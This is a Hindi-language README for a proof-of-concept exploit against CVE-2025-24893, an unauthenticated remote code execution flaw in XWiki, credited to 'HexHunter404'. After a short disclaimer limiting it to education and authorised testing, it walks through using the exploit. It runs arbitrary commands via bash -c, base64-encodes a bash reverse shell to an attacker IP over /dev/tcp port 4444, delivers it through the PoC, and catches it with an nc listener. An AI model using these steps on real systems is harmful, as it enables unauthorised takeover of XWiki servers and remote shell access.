
CVE-2025-24893 के लिए प्रमाण-अवधारणा शोषण जो XWiki पर अप्रमाणित रिमोट कोड निष्पादन को सक्षम करता है, जिसमें मनमाना शेल कमांड और पायथन के माध्यम से रिवर्स शेल इंजेक्शन शामिल है।
CVE-2025-24893 के लिए एक अद्यतन प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण, जो XWiki में एक महत्वपूर्ण बिना प्रमाणीकरण वाली RCE भेद्यता है। यह संस्करण मूल में सुधार करता है जिससे मनमाना शेल कमांड निष्पादन और स्वच्छ रिवर्स शेल इंजेक्शन की अनुमति मिलती है।
द्वारा: HexHunter404
यह कोड केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इसका उपयोग उन प्रणालियों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
bash -c '<command>' के माध्यम से कमांड निष्पादन का समर्थन करता है/xwiki पथ को संरक्षित करता है और रीडायरेक्ट लूप से बचता हैpython3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
. अपने रिवर्स शेल को Base64-एनकोड करें
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
. PoC का उपयोग करके इसे भेजें
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
. अपना लिसनर सेट करें
nc -lvnp 4444
यदि सफल होता है, तो आपको एक शेल मिलेगा